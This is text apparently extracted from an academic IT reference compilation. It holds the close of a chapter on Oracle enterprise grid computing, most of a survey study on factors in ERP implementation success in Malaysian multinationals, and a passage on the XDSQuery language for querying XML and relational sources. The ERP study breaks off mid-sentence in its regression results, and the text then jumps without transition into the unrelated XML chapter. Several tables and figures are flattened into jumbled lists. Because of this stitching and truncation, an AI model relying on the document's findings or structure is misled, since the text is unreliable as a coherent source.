In consolidating technology and IT processes, organizations need to initiate a long-term strategy to strengthen all aspects of a grid-enabling IT infrastructure by reducing fragmented data centers. Having fewer data centers eases management in one place and encourages economies of scale. Consolidation supports the methodology of grid computing at every step of system development, deployment, and management; for example, consolidating storage with an integrated structure like a storage area network (SAN) improves performance. Furthermore, modular servers can be used to consolidate databases and application servers. According to Goyal and Lawande (2006), integration may be physical, by moving data to one database, or logical, by using products like data hubs. This substantially reduces power, cooling, and space requirements as well as management costs. Consolidation maximizes the gains of standardization. Currently, the CS department at Fort Wayne is implementing a storage area network that will provide a storage subsystem to multiple hosts at the same time.
Automation
Automation of tasks and processes reduces human errors and lowers costs in an enterprise. After standardization and consolidation, automation is easier to implement. For instance, standardized operating systems and storage layouts can be automated, as scripts and automation tools can
be easily deployed. However, best management practice favors automating simple, repetitive, and laborious tasks at the onset. Such tasks can be identified at every stage, from initial deployment to ongoing maintenance of systems. At the CS department, Fort Wayne, patches, alerts, testing, deployment of servers, and maintenance can be scheduled for automation with Oracle grid control. A valuable automation is that of patching, which allows downloads from Oracle's MetaLink Web site. This feature helps keep the systems in sync and more secure.
FUTURE TRENDS
Enterprise database grid computing is increasingly being adopted by major corporations, and this trend will continue as its benefits become more obvious. More than any other factor, the fact that vendors are increasingly offering grid-enabled technologies will encourage rapid adoption in the future. Furthermore, grid computing is evolving, and many relevant standards are currently being developed. For instance, there is currently a lack of established standards for dynamic and autonomic resource provisioning, which hinders vendor interoperability (Pollock & Hodgson, 2004; Wolski, 2003). Improvements in such standards will be incorporated into new grid products. However, the current lack of grid standards should not deter the adoption of grid computing. Enterprises can adopt the grid methodology (a service-centric view of IT infrastructure; Yan & Chapman, 2006) and leverage their current investments, because companies are now creating new products that are grid-enabled (Dooley, Milfeld, Guiang, Pamidighantam, & Allen, 2006). Furthermore, there will be more developments in service-oriented architecture that will certainly impact grid applications. Ultimately, enterprise database grids will benefit from improvements in the semantic grid, which will enable meaningful information
processing or the parsing of deep relationships between data without human intervention.
CONCLUSION
The emerging grid infrastructure will substantially reduce the cost of deploying and managing enterprise applications. With further grid product offerings and improvements in hardware and grid protocols, enterprise grid computing will be embraced by many organizations in the future. It is advisable to adopt grid technology starting with a sweet spot and then incrementally integrating all aspects of the enterprise. Once the benefits of the grid are demonstrated on a small scale, scaling out can be initiated in subsequent operations. Staff resistance to adoption can be overcome through effective communication, team building, and incentives for adaptation. Oracle offers a family of products that support database grids for an efficient data-driven business. The enterprise database grid is not a disruptive technology because it leverages existing investments and best practices in an organization.
REFERENCES
Berman, F., Fox, G., & Hey, T. (2003). The grid: Past, present, future. In F. Berman, G. C. Fox, & A. J. G. Hey (Eds.), Grid computing (pp. 51-63). New York: John Wiley & Sons.
Chrabakh, W., & Wolski, R. (2006). GridSAT: Design and implementation of a computational grid application. Journal of Grid Computing, 4(2), 177-193.
Dooley, R., Milfeld, K., Guiang, C., Pamidighantam, S., & Allen, G. (2006). From proposal to production: Lessons learned developing the computational chemistry grid cyberinfrastructure. Journal of Grid Computing, 4(2), 195-208.
Finkelstein, A., Gryce, C., & Lewis-Bowen, J. (2004). Relating requirements and architectures: A study of data-grids. Journal of Grid Computing, 2(3), 207-222.
Foster, I. (2003). The Grid: A new infrastructure for 21st century science. In F. Berman, G. C. Fox, & A. J. G. Hey (Eds.), Grid computing (pp. 65-100). New York: John Wiley & Sons.
Goyal, B., & Lawande, S. (2006). Enterprise grid computing with Oracle. New York: McGraw-Hill.
Joseph, J., & Fellenstein, C. (2004). Grid computing. Upper Saddle River, NJ: Prentice Hall.
Khilani, A. (2005). Oracle enterprise manager 10g grid control: Features for database management. Retrieved December 12, 2007, from http://www.oracle.com/technology/tech/grid/index.html
Kumar, A. R., & Burleson, D. (2005). Easy Oracle automation. Kittrell, NC: Rampant Techpress.
Kusnetzky, D., & Olofson, C. W. (2004). Oracle 10g: Putting grids to work. IDC White Paper. Retrieved December 12, 2007, from http://www.oracle.com/technology/tech/grid/index.html
Murch, R. (2004). Autonomic computing. Upper Saddle River, NJ: Prentice Hall.
Oracle Inc. (2005). Grid computing with Oracle. Technical white paper. Retrieved December 12, 2007, from http://www.oracle.com/technology/tech/grid/index.html
Pollock, J. T., & Hodgson, R. (2004). Adaptive information: Improving business through semantic interoperability, grid computing, and enterprise integration. New York: John Wiley.
Watson, P. (2003). Databases and the grid. In F. Berman, G. C. Fox, & A. J. G. Hey (Eds.), Grid computing (pp. 363-384). New York: John Wiley.
Wolski, R. (2003). Experiences with predicting resource performance online in computational
KEY TERMS
Applications Grid: This grid shares and reuses application code, using software technologies like service-oriented architectures that facilitate sharing business logic among multiple applications.
Grid Computing: A style of computing that dynamically pools IT resources together for use based on resource need. It allows organizations to provision and scale resources as needs arise, thereby preventing the underutilization of resources (computers, networks, data archives, instruments).
Information Grid: This grid shares information across multiple consumers and applications. It unlocks fragmented data from proprietary applications by treating information as a resource to be shared across the grid.
Infrastructure Grid: This grid pools, shares, and reuses infrastructure resources such as hardware, software, storage, and networks across multiple applications.
Provisioning: The allocation of resources to consumers on demand. A system determines the specific need of the consumer and provides the resources as requested.
Semantic Web: An information processing model in which computers, using the resource description framework (RDF) and other technologies, can explicitly associate meanings with, or parse relationships between, data without human intervention.
Service-Oriented Architecture (SOA): A form of software design that allows different applications to interact in business processes regardless of specific technologies such as programming languages and operating systems.
Silos/Islands of Applications/Computing: A condition whereby servers or computing resources are idle most of the time when the peak load is not reached. Such IT systems are not
designed to share resources with each other, thus creating islands of information and computing infrastructure within a single enterprise.
Virtualization: A form of abstraction that provides location- and technology-transparent access to resources for the consumer. It decouples the tight connections between providers and consumers of resources, thus allowing the same resources to be shared by multiple users as needs arise.
This work was previously published in Encyclopedia of Information Science and Technology, Second Edition, edited by M. Khosrow-Pour, pp. 955-960, copyright 2009 by Information Science Reference (an imprint of IGI Global).
Chapter 6.4
Empirical Assessment of Factors Influencing Success of Enterprise Resource Planning Implementations
Fiona Fui-Hoon Nah
University of Nebraska-Lincoln, USA
Zahidul Islam
Independent University, Bangladesh
Mathew Tan
Agilent Technologies, Malaysia
ABSTRACT
Enterprise resource planning (ERP) implementations in multinational manufacturing companies have experienced various degrees of success. This article investigates factors influencing the success of ERP implementations in multinational manufacturing companies in the Malaysian Free Trade Zone. The results indicate that enterprisewide communication and a project management program are key factors influencing the success of ERP implementations, while other factors such as top management support as well as teamwork and composition are not as critical to the outcome. Organizational culture is a moderator of the relationships between enterprise-wide com-
munication, a project management program, and the success of ERP implementations.
INTRODUCTION
Enterprise resource planning (ERP) refers to a seamlessly integrated family of software packages designed to integrate various financial, human resources, supply chain, and customer information functions. This system is a natural development and progression of Material Requirements Planning (MRP/MRP II) that was popular in the 1970's. Initially conceived to increase the efficiency of materials planning, the suite of software packages eventually evolved to cover a wide scope of organizational functions, including inventory
control, finance, human resources, and manufacturing. Many companies experienced successes, but many more failed in their implementations. Some companies, such as FoxMeyer Corporation, experienced bankruptcy and resorted to suing the software company for failing to deliver the promises of the ERP system. ERP implementation is a massive and costly affair (Davenport, 2000; Lee, Siau, & Hong, 2003; Siau, 2004). ERP implementations frequently consume a large portion of a company’s time and resources (Siau & Messersmith, 2002, 2003). After more than twenty years of implementation and software development, much research has been gathered on the subject for developed nations (Bingi, Sharma, & Godla, 1999; Everdingen, Hilleegersberg, & Waarts, 2000; Kermers & van Dissel, 2000; Kumar, Maheshwari, & Kumar, 2003; Nadkarni & Nah, 2003; Scott & Vessey, 2002). However, the Southeast Asia region faced many challenges with ERP implementations (Davison, 2002; Soh, Sia, & Tay-Yap, 2000). The literature is scarce concerning ERP implementations and their success in this region (Tarafdar & Roy, 2003). The primary users of ERP systems are large multinational companies because local or regional small- to medium-sized companies have yet to fully embrace the benefits of ERP systems. In this research, we focus on investigating the factors contributing to the success of ERP implementations in multinational manufacturing companies in the Malaysian Free Trade Zone—a central zone in Southeast Asia.
LITERATURE REVIEW
ERP is a solution to fragmentation of information in large business organizations (Davenport, 1998). An ERP system typically comprises a central, state-of-the-art, comprehensive database that collects, stores, and disseminates data across all business functions and activities in an enterprise. By integrating all business functions,
economies of scale are obtained and the business gains a significant operating cost reduction, in addition to improved capabilities and information transparency. The increased business trends of globalization, mergers, and acquisitions demand that companies have the ability to control and coordinate increasingly remote operating units. An ERP system can help to achieve this by enabling the sharing of real-time information across departments, currencies, languages, and national borders. The dream of creating an enterprise-wide system began in the 1970's, but was then unrealized due to the technological barriers at that time. Instead, most companies created what McKenney and McFarlan (1982) termed "islands of automation", which naturally evolved as new IT applications were introduced to fill the constantly-emerging business needs. This gave rise to a plethora of different systems that were loosely interfaced. As a result, information was scattered throughout an organization, and detailed analyses of an organization's performance across its business functions were not possible. Such information was impossible to obtain unless manual record-sifting or specialized programming was carried out. In time, the organizational costs to maintain these "legacy" systems began to exceed the funds available for building new systems (Lientz & Swanson, 1980). Enterprise systems provide a backbone of information, communication, and control for a company (Buckhout, Frey, & Nemec, 1999), and embody the current best business practices for organizational processes (Esteves & Pastor, 2000). Numerous benefits include improvements in:
• Cooperation between managers and employees;
• Consolidation of finance, marketing and sales, human resource, and manufacturing applications;
• Management information available—real-time information available anywhere, anytime;
• Informal systems for materials management/inventory/production control;
• Lead-times, manpower costs, overtime, safety stocks, work-in-progress; and
• Delivery times.
An ERP system is a set of customizable and highly-integrative real-time business application software modules sharing a common database and supporting core business, production, and administrative functions such as logistics, manufacturing, sales, distribution, finance, and accounting. Companies that are structurally complex, geographically dispersed, and culturally vibrant tend to present unique challenges to ERP implementation (Markus, Tanis & Fenma., 2000). Unique issues of change management are particularly important for multinational companies where their parent sites are geographically separate. This complexity involves several dimensions including business strategy, software configuration, technical platform, and management execution. Of these four, management execution contributes toward ERP implementation success to the greatest degree (Nah, Zuckweiler, & Lau, 2003). Different managerial reporting lines, languages, and national cultures also make managing a multi-site ERP implementation project challenging (Markus et al., 2000). Local management must therefore be prepared to deal with the issues of enterprisewide implementation on a site level. In particular, companies in Asia confront issues substantially different from those faced by companies in the developed world (Tarafdar & Roy, 2003) due to the differences in sophistication of IT use and cultural influences.
THEORETICAL BACKGROUND ON FACTORS CONTRIBUTING TO ERP IMPLEMENTATION SUCCESS To investigate specific metrics for ERP implementation success, we reviewed the literature and
1938
identified three sets of taxonomy or classification. They are: (i) the unified critical success factors model (see Table 1) proposed by Esteves and Pastor (2000), (ii) 22 critical success factors (see Table 2) identified by Somers and Nelson (2001, 2004), and (iii) seven broad categories of critical success factors (see Table 3) developed by Nah and Delgado (2006) which were derived from the 11 critical success factors (see Table 4) identified by Nah, Lau, and Kuang (2001). Esteves and Pastor (2000) classify critical success factors into Organizational and Technological, and then further sub-divide them into strategic and tactical factors. By cross-referencing each of the factors with its citations in the literature, Esteves and Pastor (2000) derived the ERP implementation success matrix (also termed unified critical success factors model) presented in Table 1. Somers and Nelson (2001) identified 22 critical success factors presented in Table 2 and evaluated them across stages of ERP implementation. The top six factors across the stages are: (i) top management support, (ii) project team competence, (iii) inter-departmental cooperation, (iv) clear goals and objectives, (v) project management, and (vi) inter-departmental communication. Another comprehensive examination of the critical success factors of ERP implementation was carried out by Nah and her colleagues (Nah, et al., 2001; Nah, et al., 2003; Nah & Delgado, 2006). These factors fall into seven broad categories (see Table 3) and can be further broken down into 11 critical success factors (see Table 4). Among the 11 critical success factors presented in Table 4, the top six critical success factors identified by Chief Information Officers of Fortune 1000 companies are: (i) top management support, (ii) project champion, (iii) ERP teamwork and composition, (iv) project management, (v) change management program and culture, and (vi) effective enterprise-wide communication (Nah et al., 2003).
Empirical Assessment of Factors Influencing Success of Enterprise Resource Planning Implementations
Table 1. Unified critical success factors model Strategic
Technological
Organizational
• • • • • • • • • • •
Sustained management support Effective organizational change management Good project scope management Adequate project team composition Comprehensive business process reengineering Adequate project champion role User involvement and participation Trust between partners Adequate ERP implementation strategy Avoid customization Adequate ERP version
Hence, top management support, project management, and enterprise-wide (or inter-departmental) communication are three common factors in Nah et al.’s (2003) and Somers and Nelson’s (2001) “top factors” lists, whereas “ERP teamwork and composition” in Nah et al.’s (2003) list captures key aspects of project team competence and inter-departmental cooperation in Somers and Nelson’s (2001) list. Therefore, we selected this set of four factors—top management support, project management, enterprise-wide communication, and ERP teamwork and composition—as independent variables for our study. These four factors are also ranked among the top five factors in Nah and Delgado’s (2006) case study on ERP implementations in two organizations. Figure 1 shows the research model, and the next section provides justifications for the hypotheses. Hypotheses 1-4 specify the direct hypothesized effect of the independent variables—top management support, teamwork and composition, enterprise-wide communication, project management program—on the dependent variable—success of ERP implementation, whereas Hypotheses 5-8 state the moderating effect of organizational culture on these relationships.
Tactical • • • • • • •
Dedicated staff and consultants Strong communication inwards and outwards Formalized project plan/schedule Adequate training program Preventive troubleshooting Appropriate usage of consultants Empowered decision-makers
• •
Adequate software configuration Legacy systems knowledge
Table 2. Twenty-two critical success factors model Critical Success Factors 1. Top management support 2. Project team competence 3. Interdepartmental cooperation 4. Clear goals and objectives 5. Project management 6. Interdepartmental communication 7. Management of expectations 8. Project champion 9. Vendor support 10. Careful package selection 11. Data analysis and conversion 12. Dedicated resources 13. Use of steering committee 14. User training on software 15. Education on new business processes 16. Business process reengineering 17. Minimal customization 18. Architecture choices 19. Change management 20. Partnership with vendor 21. Use of vendors’ tools 22. Use of consultants
ERP CRITICAL SUCCESS FACTORS Rockart (1979) is one of the first researchers to study critical success factors of IT implementa-
1939
Empirical Assessment of Factors Influencing Success of Enterprise Resource Planning Implementations
Table 3. Seven broad categories of critical success factors 1.
Business plan and vision 1.1 Business plan/vision 1.2 Project mission/goals 1.3 Justification for investment in ERP
2.
Change management 2.1 Recognizing the need for change 2.2 Enterprise-wide culture and structure management 2.3 Commitment to change—perseverance and determination 2.4 Business process reengineering 2.5 Analysis of user feedback 2.6 User education and training 2.7 User support organization and involvement 2.8 IT workforce re-skilling
3.
Communication 3.1 Targeted and effective communication 3.2 Communication among stakeholders 3.3 Expectations communicated at all levels 3.4 Project progress communication
4.
ERP team composition, skills, and compensation 4.1 Best people on team 4.2 Balanced or cross-functional team 4.3 Full-time team member 4.4 Partnerships, trust, risk-sharing, and incentives 4.5 Empowered decision-makers 4.6 Performance tied to compensation 4.7 Business and technical knowledge of team members and consultants
5.
6.
1940
Project management 5.1 Assign responsibility 5.2 Clearly establish project scope 5.3 Control project scope 5.4 Evaluate any proposed change 5.5 Control and assess scope expansion requests 5.6 Define project milestones 5.7 Set realistic milestones and end dates 5.8 Enforce project timeliness 5.9 Coordinate project activities across all affected parties 5.10 Track milestones and targets Top management support and championship 6.1 Approval and support from top management 6.2 Top management publicly and explicitly identifies project as top priority 6.3 Allocate resources 6.4 Existence of project champion 6.5 High-level executive sponsor as champion 6.6 Project sponsor commitment
7.
Systems analysis, selection, and technical implementation 7.1 Legacy system 7.2 Minimum customization 7.3 Configuration of overall ERP architecture 7.4 Vigorous and sophisticated testing 7.5 Integration 7.6 Use of vendor’s development tools and implementation methodologies 7.7 ERP package selection 7.8 Selection of ERP architecture 7.9 Selection of data to be converted 7.10 Data conversion 7.11 Appropriate modeling methods/techniques 7.12 Troubleshooting
Table 4. Eleven key critical success factors Critical Success Factors 1. ERP teamwork and composition 2. Change management program and culture 3. Top management support 4. Business plan and vision 5. Business process reengineering with minimum customization 6. Project management 7. Monitoring and evaluation of performance 8. Effective enterprise-wide communication 9. Software development, testing, and troubleshooting 10. Project champion 11. Appropriate business and IT legacy systems
tions. According to his account, these factors are the “areas in which results, if they are satisfactory, will ensure successful competitive performance for the organization” (p. 85). Most of the literature in the MIS field list in excess of 20 critical success factors (Nielsen, 2002). Esteves and Pastor (2000) present a unified model of critical success factors, and further studied the effects of these factors in SAP’s ASAP implementation methodology. To study key critical factors influencing ERP implementation success, we identified four “top” factors—top management support, ERP teamwork and composition, enterprise-wide communication, and project
Empirical Assessment of Factors Influencing Success of Enterprise Resource Planning Implementations
Figure 1. Research model Independent variables Top management support
H1
Moderator Teamwork and composition
H2 Organizational culture Dependent variable
H5-H8 Enterprise-wide communication
H3
Project management program
H4
management program—that we examine in this research. Technological factors such as system configuration, customization, and legacy data migration are outside the scope of this research and are excluded from this study.
Top Management Support Not only is the criticality of top management support widely cited throughout the ERP literature (e.g., Dong, 2001; Somers & Nelson, 2004), several studies (Akkermans & van Helden, 2002; Esteves & Pastor, 2000; Nah et al., 2003; Somers & Nelson, 2001) have also identified top management support as the top and most crucial factor in ERP implementation. Similarly, Sarker and Lee (2003) identified strong and committed leadership as a necessary condition for success in ERP implementation. Willocks and Sykes (2000) noted that senior-level sponsorship, championship, support, and participation is one of the critical enabling factors for success in an ERP project. Public, explicit, and sincere support for the project must be present to emphasize the priority of the project. Accordingly, commitment of valuable resources to the implementation effort (Holland, Light, & Gibson, 1999; Roberts & Barrar, 1992)
Success of ERP implementation
provides the practical support that is needed to ensure success in an ERP project. Top management commitment is the most widely-studied factor in successful IS implementations (Dong, 2001) and is also the most severe source of difficulty in IS implementations. Top management support is even more important in the case of ERP because of the scale of the project and the amount of resources needed for the enterprise-wide project. Hence, we hypothesize that: H1: Top management support increases the level of success of ERP implementation.
Teamwork and Composition The ERP team should comprise the best people in the organization to maximize the chances of success of the project (Buckhout et al., 1999; Bingi et al, 1999; Rosario, 2000). The team should be cross-functional and possess the necessary technical and functional skills for design, implementation, and assimilation. The team will have to integrate business functions with the capabilities of the software as well as possess the necessary credentials to influence business process changes where necessary. The effective
1941
Empirical Assessment of Factors Influencing Success of Enterprise Resource Planning Implementations
use of consultants also improves the likelihood of success of the project (Haines & Goodhue, 2003). Compensation, incentives, and the mandate for successfully implementing the system on time and within budget should be given to the team to foster teamwork in the project (Buckhout et al., 1999). It is also helpful to ensure that the ERP team is colocated to facilitate teamwork and coordination among the members. We, therefore, hypothesize that: H2: The use of cross-functional teams that comprise people with the best business and technical knowledge increases the level of success of ERP implementation.
of benefit while convincing them to abandon the old, comfortable systems requires persuasiveness and acts of showmanship on the part of management and the implementation team. Users need to know that the feedback they provide will be considered and acted upon (Rosario, 2000). Among the stakeholders of companies studied by Holland et al. (1999), it was found that communication is a critical success factor of ERP implementation. For example, Shanks, Parr, Hu, Corbitt, Thanasankit, and Seddon (2000) found that the likelihood of ERP implementation failure increased when dates were not properly communicated well in advance to stakeholders. Based on the above discussion, we hypothesize that:
Enterprise-Wide Communication Communication across the different levels and functions of an organization is necessary for success in ERP implementation (Akkermans & van Helden, 2002; Falkowski, Pedigo, Smith, & Swanson, 1998; Parr, Shanks, & Darke, 1999). Communication is a complex factor that includes, but is not limited to, specifications of individual roles and responsibilities, clear definitions of the project milestones, pre-implementation training, and unambiguous definition of the time horizon (Petroni, 2002). Monthly bulletins, newsletters, weekly meetings, and frequent e-mail updates are among the tools that can be employed. This communication needs to be two-way to avoid design gaps that can occur if the exact business requirements or comments and approval from the ground up are ignored. Esteves and Pastor (2000) also noted that both “outward” communication to the whole organization and “inward” communication to the project team are very important. Rosario (2000) advocates an early “proof of concept” to minimize skepticism and sustain excitement. This kind of demonstration should be public and well endorsed by key project champions and top management. Keeping the morale high and convincing the users that the new ERP system is
1942
H3: Enterprise-wide communication during the implementation increases the level of success of ERP implementation.
Project Management Program The proper and effective management of an ERP project is essential for its success (Nah et al., 2003). An ERP project management program requires well-defined task assignments, accounting for resource allocations, project control-keeping, and avoiding “creep” (Bagranoff & Brewer, 2003; Rosario, 2000) which is the tendency of the project to acquire additional software requirements and customization and to uncover hidden issues as time goes by. Jiang, Klein, and Balloun (1996) found that a competent project manager is the second most important factor in an IS implementation. The scope of the project should be clearly established, managed, and controlled (Shanks et al., 2000). Ross (1999) indicated that establishing program scope is the key to successful ERP implementation. Proposed changes should be evaluated against business benefits, and scope expansion requests should be assessed in terms of the additional time and cost of proposed changes (Sumner, 1999). In addition, approved
Empirical Assessment of Factors Influencing Success of Enterprise Resource Planning Implementations
changes need to be coordinated across all affected parties (Falkowski et al., 1998). Schniederjans and Kim (2003) proposed that ERP systems implementations can be supplemented by Total Quality Management (TQM) and Business Process Re-engineering (BPR) programs to prepare an organization to be more receptive to the new ERP system. They suggested that the actual ERP implementation be preceded by BPR and followed up by a rigorous TQM program, to produce the effect of Lewin’s (1951) recommended change criteria of unfreezing (BPR), change (ERP), and refreezing (TQM). As discussed above, project management is essential to the success of ERP implementations. Thus, we hypothesize that: H4: A project management program increases the level of success of ERP implementation.
ORGANIZATIONAL CULTURE
The organizational culture paradigm, as defined by Johnson and Scholes (2005), is a set of assumptions held relatively in common and taken for granted in an organization. It includes collective experience, values, beliefs, and behavioral norms. These assumptions exist at the organizational level, and they have worked well enough to be considered valid. An organizational culture that promotes learning and innovation can be especially influential to the success or failure of an organization's IT innovation or strategy (Johnson & Scholes, 2005; Sitkin, 1992). Scott and Vessey (2000) provide case study evidence to show that organizational culture can impact the success or failure of ERP implementation. According to Sitkin (1992), the proximity of an organization to a "learning" state would, in theory, greatly facilitate the process of change. An organizational culture that promotes learning encourages involvement/participation and adaptation. Edwards and Panagiotidis (2000) support the proposition that organizational culture is useful in understanding successful ERP implementations. They proposed a Business Systems Purpose Analysis (BSPA) methodology and recommended its integration into SAP's ASAP implementation methodology. Skok and Legge (2002) highlight the importance of cultural as well as business process changes. According to them, ERP problems commonly lie in the employees feeling uncomfortable with the cultural changes that follow from process changes in the ERP implementation. Thus, unless the organizational culture promotes openness in communication and facilitates learning, the employees may behave in a detrimental fashion towards the new ERP system, causing its failure.
Organizational Culture as a Moderator of ERP Implementation Success
A management team that readily accepts new concepts and is able to learn to accept and adapt to new tools as they become available is able to drive the implementation of a new enterprise-wide system more effectively than a management team that prefers to maintain the "status quo" and is suspicious of progress (Dong, 2001). Since learning in an organization needs to be led from all levels of the organization, particularly from top-level management, a management team that is conducive to change (as in the case of an open and supportive organizational culture) is more likely to convince and persuade the rest of the organization to follow suit, which contributes toward the success of the ERP implementation. H5: Organizational culture moderates the relationship between top management support and the success of ERP implementation. ERP implementation teams are by necessity cross-functional, as the new system brings
together and integrates the various functions within an organization. In order to derive the best benefits from the ERP system, the cross-functional teams working on the project should not only be able to work well together, but also understand and appreciate the different strengths and skills that each member brings to the teams. Closed or non-learning organizations are more prone to encounter difficulties in facilitating teamwork and coordination among members of cross-functional teams. H6: Organizational culture moderates the relationship between ERP teamwork-and-composition and the success of ERP implementation. An organizational culture that promotes openness in communication facilitates the process of organizational learning, which contributes toward ERP implementation success. An open and supportive organizational culture encourages increased interaction and improved communication, which help to facilitate communication of the new and complex concepts of ERP systems to the end-users. Since the sheer scale and complexity of an ERP system will require almost all company personnel to learn new tools and new ways of working, organizational culture can facilitate the learning processes involved in such implementations, which are necessary for successful implementation. H7: Organizational culture moderates the relationship between enterprise-wide communication and the success of ERP implementation. Team leaders faced with the challenge of managing a project of this magnitude typically face tight deadlines and a near-impossible task of disseminating all the required training to end-users. Furthermore, the leaders of the project team need to clearly specify responsibilities, establish and control project scope, evaluate any proposed change, assess scope expansion requests, define
and set project milestones, enforce timeliness of the project, and coordinate project activities across all affected parties. Thus, a learning culture benefits these processes and increases the success of the implementation. H8: Organizational culture moderates the relationship between a project management program and the success of ERP implementation.
SUCCESS OF ERP IMPLEMENTATION
The dependent variable in this study is the success of ERP implementation. "Success" can be defined in several ways. For project leaders, a successful implementation means that the project is completed on time and within budget, with minimal disruption to product shipment and customer service during the cutover period. However, from a strategic point of view, success does not only refer to meeting the "Go Live" date, but also to the increased value of the business from usage of the new ERP system. Markus and Tanis (2000) also pointed out that success means different things depending on the perspective one takes and the person defining it. For example, project managers often define success in terms of completing the project on time and within budget. The business, however, takes the view of a smooth transition to stable operations with the new system, achieving intended business improvements like inventory reductions, and gaining improved decision-support capabilities (Markus & Tanis, 2000). Markus and Tanis define optimal success as the "best outcomes the organization could achieve with enterprise systems, given its business situation, measured against a portfolio of project, early operational, and longer-term business results metrics" (p. 186). Similarly, in this study, we will adopt the business value and performance perspective of success in ERP implementation. This perspective is also
adopted by other researchers studying IS/IT success (Langdon, 2006; Mukhopadhyay, Kekre, & Kalathur, 1995; Tallon & Kraemer, 2006). Petroni (2002) pointed out that simply asking users to rate their level of satisfaction would not be accurate or sufficient to assess success of an implementation. Neither would it be practical to ask a manager to define an implementation as anything less than successful, since no one is typically willing to shoulder the responsibility of failure. Petroni therefore suggests a set of criteria for judging the success of implementation (see Table 5) to help minimize respondent bias. We adapt Petroni’s criteria, which include assessment of both performance and user satisfaction, to quantify optimal success from the business and strategic perspective. These criteria are also in line with Gable, Sedera, and Chan’s (2003) measurement model for enterprise system success which covers organizational and individual impact as well as user satisfaction.
RESEARCH METHODOLOGY
The primary source of data collection was a survey, which was administered to both managerial and non-managerial staff from multinational companies in the Free Trade Zone of Malaysia. These
companies had implemented ERP systems and were involved in distribution and manufacturing activities. The survey questionnaire was adapted from Nah et al. (2003) and Petroni (2002), and is presented in the Appendix. Pilot studies were conducted to validate these measures prior to finalizing the questionnaire. The primary means of distributing the survey questionnaire was via e-mail. The questionnaire was distributed after pre-contacting the recipients and informing them about the pending survey. Two hundred copies of the questionnaire were distributed, and the responses were collected electronically over a three-month period. A total of 110 questionnaires were returned. Hence, the response rate is 55%.
RESULTS
Respondents were asked to provide demographic information. Analysis of the demographic data indicates that 63% of the respondents were male and 37% were female. In terms of education, 66% reported holding a Master's degree and 14% have a Ph.D. Thirty-seven percent of the respondents reported holding managerial positions, while 54% were in non-managerial positions. A majority of the respondents (63%) have been with their companies for less than five years, and 18% of the
Table 5. Optimal success criteria
Improved ability: ability to meet volume/product changes; capacity planning; cost estimation; inventory control; delivery dates; production scheduling
Improved efficiency and user satisfaction: cooperation between managers and employees; coordination between finance, marketing, and sales
Reductions: delivery or lead-times; informal systems for materials management; informal systems for inventory control; informal systems for production control; expediting of shipments; expediting of incoming materials; work in progress (WIP)
Table 6. Summary of reliability analysis (number of items; Cronbach Alpha)
Top Management Support: 5 items; .82
Teamwork and Composition: 5 items; .72
Effective Communication: 5 items; .89
Project Management Program: 5 items; .75
Organizational Culture: 6 items; .83
Success of ERP Implementation: 5 items; .83
respondents have been with their companies for 6 to 10 years. Eighty percent of the respondents were from companies that exceeded $4 million USD in annual revenue, and 64% were from organizations with more than 3,000 employees. Table 6 shows the reliability assessments for both the independent and dependent variables. To assess the internal consistency and stability of the data, Cronbach Alpha was used to establish the inter-item consistency. Since the Cronbach Alpha coefficients are all above 0.7 (Nunnally, 1978), it can be concluded that the measures are reliable. Regression analysis was first carried out to assess H1-H4. Hierarchical regression was then used to test H5-H8, the moderating effect of organizational culture on the relationships between the independent variables and success of ERP implementation. We used a significance level of 0.05, or 5%, as the basis for accepting or rejecting the hypotheses. As shown in the regression results in Table 7, the R² value is 0.389, indicating that the four independent variables explain 38.9% of the variance. A Durbin-Watson statistic of 1.71 indicates that there is no auto-correlation problem. Tolerance and VIF values are also within the acceptable range, indicating that there is no multi-collinearity problem. The results presented in Table 7 prompted rejection of Hypotheses 1 and 2, and acceptance of Hypotheses 3 and 4. The results suggest that top management support (p=0.42) and teamwork
and composition (p=0.42) did not influence success of ERP implementation. On the other hand, enterprise-wide communication (p
Business Information Integration from XML and Relational Databases Sources
Figure 5(b). Example of the XDSSchema corresponding to the output XML format represented in Figure 5(a)
Table 5. Grammar of the XDSQuery language (Query, Expr, ExprSingle, ...)
Figure 6. Format of the elements of the XDSQuery language
Figure 7. Example of an XDSConnections document
Figure 8. Example of an XDSQuery request
refers to the field of the record that holds the information associated with these XML nodes. Since a record can contain NF2 structures – for example, after the NEST operation – it may include composed and/or multi-value fields. In XDSSchema there always exists a currentNF2 structure that refers to the database record. If the user wants to refer to a value that is inside a composed or multi-value field, it cannot be accessed directly in the SQL sentence. To permit this, the newF2 attribute allows the origin of the currentNF2 to be changed; the value of this attribute points to the name of a composed or multi-value field in the preceding currentNF2. If it is a multi-value field, it is additionally necessary to declare the repetitive structure by using the value unbounded in the maxOccurs attribute, and to indicate the name of the associated multi-value field in the occursField attribute. Finally, an XDSSchema can contain as many transformation definitions as the user wants to make. When the user executes an XDSQuery, he or she has to indicate which transformation to apply to the results of the SQL query (each transformation has a name attribute
to identify it) and the root element of the applied XDSSchema. Figures 5(a) and 5(b) show an example of the XDSSchema application. Figure 5(a) shows the structure of the output XML result using a DTD representation and an explanatory table. Figure 5(b) shows the equivalent structure using the syntax of the XDSSchema. This last figure also shows the general representation (its three main elements, displayed in different colors together with their contents) of any XML document obtained as a result of applying the indicated XDSSchema.
XDSQuery
XDSQuery is the component that processes the client requests and their results, but it is also the name of the language used by the clients to query the data sources. This language is very similar to XQuery, but it is written in XML, so the user can more easily create and modify queries. XDSQuery is an extension of XQuery that is written in XML and adds new features to
access not only XML sources, but also relational sources. XDSQuery exploits the FLWOR (for-let-where-order by-return) expressions of XQuery to formulate the queries. Table 5 shows the commands or elements of the XDSQuery grammar, and Figure 6 shows the rules for combining the elements of that table to obtain a client request written in the XDSQuery language. In XDSQuery, a dedicated element indicates the queried source. Its connection and query attributes identify the connection name for the data source and the native query to execute, both of which will have been defined previously in the XDSConnections document. For an SQL data source, it is also possible to specify the XDSSchema and the root element to apply to the output result, using the schema and root attributes. If these attributes are not specified in a request to an SQL source, the canonical XML transformation model is applied by default. Moreover, a request to an SQL source can also carry parameters for the query. The next example describes the use of XDSQuery. Suppose a client wants to obtain an XML document with the data of some teachers and the courses they teach. The teacher and course information is stored in a relational database, and the codes of the teachers are in an XML document. Figure 7 shows the XDSConnections configuration document for this example. In this document, the connection to the XML document "prof.xml", which contains the teacher codes, is specified, as well as the connection to the database. In the first connection, the XPath query over the XML document is defined. In the second connection is the SQL query that obtains the information about the specified teachers and their courses from the database. Moreover, in this last query it is also specified that the results have to be nested and that the XDSSchema is applied to the XML output.
Figure 8 shows the details of the XDSQuery to be applied by the user to obtain the described result in the previous example.
